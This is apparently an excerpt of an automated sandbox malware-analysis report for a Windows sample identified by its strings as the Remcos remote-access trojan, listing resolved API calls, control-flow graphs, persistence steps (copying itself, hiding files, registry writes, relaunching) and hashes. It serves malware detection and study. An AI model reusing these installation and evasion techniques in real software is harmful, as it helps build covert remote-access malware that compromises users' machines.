47025->47039 47271 41a75b 29 API calls 47026->47271 47030 41b16b GetCurrentProcess 47027->47030 47029 40ca03 GetLongPathNameW 47267 403b40 47029->47267 47033 40c914 47030->47033 47031 40c8e3 47034 401e18 11 API calls 47031->47034 47036 40c918 47033->47036 47037 40c96a 47033->47037 47038 40c8ed 47034->47038 47042 403b40 28 API calls 47036->47042 47041 403b40 28 API calls 47037->47041 47046 401e13 11 API calls 47038->47046 47039->47029 47040 403b40 28 API calls 47043 40ca27 47040->47043 47044 40c978 47041->47044 47045 40c926 47042->47045 47274 40cc37 28 API calls 47043->47274 47049 403b40 28 API calls 47044->47049 47050 403b40 28 API calls 47045->47050 47046->47039 47048 40ca3a 47275 402860 28 API calls 47048->47275 47053 40c98e 47049->47053 47054 40c93c 47050->47054 47052 40ca45 47276 402860 28 API calls 47052->47276 47273 402860 28 API calls 47053->47273 47272 402860 28 API calls 47054->47272 47058 40ca4f 47061 401e13 11 API calls 47058->47061 47059 40c999 47062 401e18 11 API calls 47059->47062 47060 40c947 47063 401e18 11 API calls 47060->47063 47064 40ca59 47061->47064 47065 40c9a4 47062->47065 47066 40c952 47063->47066 47067 401e13 11 API calls 47064->47067 47068 401e13 11 API calls 47065->47068 47069 401e13 11 API calls 47066->47069 47070 40ca62 47067->47070 47071 40c9ad 47068->47071 47072 40c95b 47069->47072 47073 401e13 11 API calls 47070->47073 47074 401e13 11 API calls 47071->47074 47075 401e13 11 API calls 47072->47075 47076 40ca6b 47073->47076 47074->47038 47075->47038 47077 401e13 11 API calls 47076->47077 47078 40ca74 47077->47078 47079 401e13 11 API calls 47078->47079 47080 40ca7d 47079->47080 47080->46738 47082 40bc7a _wcslen 47081->47082 47083 40bc84 47082->47083 47084 40bcce 47082->47084 47087 40bc8d CreateDirectoryW 47083->47087 47085 40c89e 31 API calls 47084->47085 47086 40bce0 47085->47086 47088 401e18 11 API calls 47086->47088 47278 40856b 47087->47278 47090 40bccc 47088->47090 47092 401e13 11 API calls 47090->47092 47091 40bca9 47312 4028cf 47091->47312 47097 40bcf7 47092->47097 47094 40bcb5 47095 401e18 11 API calls 47094->47095 47096 40bcc3 47095->47096 47098 401e13 11 API calls 47096->47098 47099 40bd10 47097->47099 47100 40bd2d 47097->47100 47098->47090 47103 40bb7b 31 API calls 47099->47103 47101 40bd36 CopyFileW 47100->47101 47102 40be07 47101->47102 47105 40bd48 _wcslen 47101->47105 47284 40bb7b 47102->47284 47104 40bd21 47103->47104 47104->46745 47105->47102 47107 40bd64 47105->47107 47108 40bdb7 47105->47108 47110 40c89e 31 API calls 47107->47110 47109 40c89e 31 API calls 47108->47109 47113 40bdbd 47109->47113 47114 40bd6a 47110->47114 47111 40be4d 47112 40be95 CloseHandle 47111->47112 47117 403b40 28 API calls 47111->47117 47310 401e07 47112->47310 47118 401e18 11 API calls 47113->47118 47119 401e18 11 API calls 47114->47119 47115 40be18 47115->47111 47120 40be2a SetFileAttributesW 47115->47120 47122 40be63 47117->47122 47123 40bdb1 47118->47123 47124 40bd76 47119->47124 47134 40be39 _wcslen 47120->47134 47121 40beb1 ShellExecuteW 47125 40bec4 47121->47125 47126 40bece ExitProcess 47121->47126 47127 41ae18 28 API calls 47122->47127 47131 401e13 11 API calls 47123->47131 47128 401e13 11 API calls 47124->47128 47129 40bed7 CreateMutexA GetLastError 47125->47129 47130 40be76 47127->47130 47132 40bd7f 47128->47132 47129->47104 47315 412774 RegCreateKeyW 47130->47315 47135 40bdcf 47131->47135 47133 40856b 28 API calls 47132->47133 47136 40bd93 47133->47136 47134->47111 47137 40be4a SetFileAttributesW 47134->47137 47138 40bddb CreateDirectoryW 47135->47138 47139 4028cf 28 API calls 47136->47139 47137->47111 47141 401e07 47138->47141 47142 40bd9f 47139->47142 47144 40bdeb CopyFileW 47141->47144 47145 401e18 11 API calls 47142->47145 47144->47102 47147 40bdf8 47144->47147 47148 40bda8 47145->47148 47146 401e13 11 API calls 47146->47112 47147->47104 47149 401e13 11 API calls 47148->47149 47149->47123 47150->46630 47151->46640 47153->46664 47154->46693 47155->46686 47156->46677 47157->46691 47158->46751 47159->46770 47160->46731 47162 401f6e 47161->47162 47349 402301 47162->47349 47165->46750 47166->46756 47167->46763 47168->46773 47169->46781 47170->46792 47171->46798 47172->46806 47173->46828 47174->46841 47175->46816 47176->46821 47177->46849 47178->46858 47179->46848 47180->46862 47181->46871 47182->46857 47353 419e99 104 API calls 47183->47353 47184->46684 47187 40e183 47186->47187 47188 41a66c LoadResource LockResource SizeofResource 47186->47188 47189 43a89c 47187->47189 47188->47187 47190 446b0f 47189->47190 47191 446b4d 47190->47191 47192 446b38 HeapAlloc 47190->47192 47197 446b21 _strftime 47190->47197 47206 445364 20 API calls __dosmaperr 47191->47206 47194 446b4b 47192->47194 47192->47197 47195 446b52 47194->47195 47195->46911 47197->47191 47197->47192 47205 442210 7 API calls 2 library calls 47197->47205 47199 401f8e 47198->47199 47207 402325 47199->47207 47201 401fa4 47201->46914 47203 401f86 28 API calls 47202->47203 47204 406066 47203->47204 47204->46921 47205->47197 47206->47195 47208 40232f 47207->47208 47210 40233a 47208->47210 47211 40294a 28 API calls 47208->47211 47210->47201 47211->47210 47213 40250d 47212->47213 47215 40252b 47213->47215 47216 40261a 28 API calls 47213->47216 47215->46925 47216->47215 47217->46946 47218->46946 47219->46935 47220->46927 47221->46950 47222->46954 47223->46956 47226 402e85 47225->47226 47227 402ea9 47226->47227 47228 402e98 47226->47228 47230 402eae 47226->47230 47227->46965 47232 403445 28 API calls 47228->47232 47230->47227 47233 40225b 11 API calls 47230->47233 47232->47227 47233->47227 47235 404bd0 47234->47235 47238 40245c 47235->47238 47237 404be4 47237->46968 47239 402469 47238->47239 47241 402478 47239->47241 47242 402ad3 28 API calls 47239->47242 47241->47237 47242->47241 47243->46972 47244->46975 47246 401e94 47245->47246 47248 41a481 47247->47248 47249 41b178 GetCurrentProcess 47247->47249 47250 412513 RegOpenKeyExA 47248->47250 47249->47248 47251 412541 RegQueryValueExA RegCloseKey 47250->47251 47252 412569 47250->47252 47251->47252 47253 401f66 28 API calls 47252->47253 47254 41257e 47253->47254 47254->46996 47255->47004 47257 40b02f 47256->47257 47260 40b04b 47257->47260 47259 40b045 47259->47015 47261 40b055 47260->47261 47263 40b060 47261->47263 47264 40b138 28 API calls 47261->47264 47263->47259 47264->47263 47265->47019 47266->47022 47268 403b48 47267->47268 47277 403b7a 28 API calls 47268->47277 47270 403b5a 47270->47040 47271->47031 47272->47060 47273->47059 47274->47048 47275->47052 47276->47058 47277->47270 47279 408577 47278->47279 47321 402ca8 47279->47321 47283 4085a3 47283->47091 47285 40bba1 47284->47285 47286 40bbdd 47284->47286 47339 40b0dd 47285->47339 47287 40bc1e 47286->47287 47289 40b0dd 28 API calls 47286->47289 47290 40bc5f 47287->47290 47293 40b0dd 28 API calls 47287->47293 47292 40bbf4 47289->47292 47290->47115 47295 4028cf 28 API calls 47292->47295 47296 40bc35 47293->47296 47294 4028cf 28 API calls 47297 40bbbd 47294->47297 47298 40bbfe 47295->47298 47299 4028cf 28 API calls 47296->47299 47300 412774 14 API calls 47297->47300 47301 412774 14 API calls 47298->47301 47302 40bc3f 47299->47302 47303 40bbd1 47300->47303 47306 40bc12 47301->47306 47304 412774 14 API calls 47302->47304 47305 401e13 11 API calls 47303->47305 47307 40bc53 47304->47307 47305->47286 47308 401e13 11 API calls 47306->47308 47309 401e13 11 API calls 47307->47309 47308->47287 47309->47290 47311 401e0c 47310->47311 47345 402d8b 47312->47345 47314 4028dd 47314->47094 47316 4127c6 47315->47316 47319 412789 47315->47319 47317 401e13 11 API calls 47316->47317 47318 40be89 47317->47318 47318->47146 47320 4127a2 RegSetValueExW RegCloseKey 47319->47320 47320->47316 47322 402cb5 47321->47322 47323 402cc8 47322->47323 47325 402cd9 47322->47325 47326 402cde 47322->47326 47332 403374 28 API calls 47323->47332 47328 402de3 47325->47328 47326->47325 47333 402f21 11 API calls 47326->47333 47329 402daf 47328->47329 47334 4030f7 47329->47334 47331 402dcd 47331->47283 47332->47325 47333->47325 47335 403101 47334->47335 47337 403115 47335->47337 47338 4036c2 28 API calls 47335->47338 47337->47331 47338->47337 47340 40b0e9 47339->47340 47341 402ca8 28 API calls 47340->47341 47342 40b10c 47341->47342 47343 402de3 28 API calls 47342->47343 47344 40b11f 47343->47344 47344->47294 47346 402d97 47345->47346 47347 4030f7 28 API calls 47346->47347 47348 402dab 47347->47348 47348->47314 47350 40230d 47349->47350 47351 402325 28 API calls 47350->47351 47352 401f80 47351->47352 47352->46744 47361 411637 62 API calls 47356->47361

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 0041BCF3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                                                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                                                                            • API String ID: 384173800-625181639
                                                                                                                                                                                                                                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                                            • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE
                                                                                                                                                                                                                                            Function 0040D767 Relevance: 93.5, APIs: 12, Strings: 41, Instructions: 799COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 5 40d767-40d7e9 call 41bcf3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afd3 call 40e8bd call 401d8c call 43e830 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d941 call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 97 40d946-40d94a 70->97 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 93 40d9c0-40d9cc call 41a473 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 104 40d9d5-40d9d9 93->104 105 40d9ce-40d9d0 93->105 94->93 97->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 97->100 99->79 108 40da18-40da2b call 401d64 call 401e8f 104->108 109 40d9db call 40697b 104->109 105->104 127 40da32-40daba call 401d64 call 41ae18 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a621 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 165 40dcaa-40dd01 call 436060 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 189 40dad7-40db03 call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e 164->189 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5f7 165->220 169 40dbb1-40dbbb call 4082d7 166->169 170 40db35-40dba7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->170 179 40dbc0-40dbe4 call 4022f8 call 4338d8 169->179 259 40dbac-40dbaf 170->259 197 40dbf3 179->197 198 40dbe6-40dbf1 call 436060 179->198 234 40db08-40db1d call 401e18 call 401e13 189->234 203 40dbf5-40dc6a call 401e07 call 43e359 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 call 4338e1 call 401d64 call 40b125 197->203 198->203 203->220 274 40dc70-40dc91 call 401d64 call 41ae18 call 40e219 203->274 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 234->163 259->179 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41bec0 CreateThread 273->275 274->220 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a696 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43361d call 401d64 call 401e8f CreateThread 280->331 292->92 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 342 40def9-40df0c call 401d64 call 401e8f 332->342 343 40debd-40def4 call 43361d call 401d64 call 401e8f CreateThread 332->343 353 40df6c-40df7f call 401d64 call 401e8f 342->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->354 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 40b95c 353->365 366 40dfba-40dfde call 41a7b2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 395 40e019-40e020 390->395 396 40e00d-40e017 CreateThread 390->396 391->390 398 40e022-40e025 395->398 399 40e033-40e038 395->399 396->395 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a696 call 401eea 399->404 413 40e094-40e0d4 call 41ae18 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae18 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                                                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\iGhDjzEiDU.exe,00000104), ref: 0040D790
                                                                                                                                                                                                                                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                                                                            • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\iGhDjzEiDU.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                                                                                                                                            • API String ID: 2830904901-670684345
                                                                                                                                                                                                                                            • Opcode ID: 639fc98fedbc16fab387638ab5a2c649c2c3843ca71600449f4dc7e2ce9c852b
                                                                                                                                                                                                                                            • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 639fc98fedbc16fab387638ab5a2c649c2c3843ca71600449f4dc7e2ce9c852b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                                                                                                                                                                                                            Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\iGhDjzEiDU.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\iGhDjzEiDU.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                                                                                            • String ID: 6$C:\Users\user\Desktop\iGhDjzEiDU.exe$del$open$BG$BG
                                                                                                                                                                                                                                            • API String ID: 1579085052-809517123
                                                                                                                                                                                                                                            • Opcode ID: f33fe05bea55441c491c63f8bba3e77330e3bc916226144ae537057c72fca099
                                                                                                                                                                                                                                            • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f33fe05bea55441c491c63f8bba3e77330e3bc916226144ae537057c72fca099
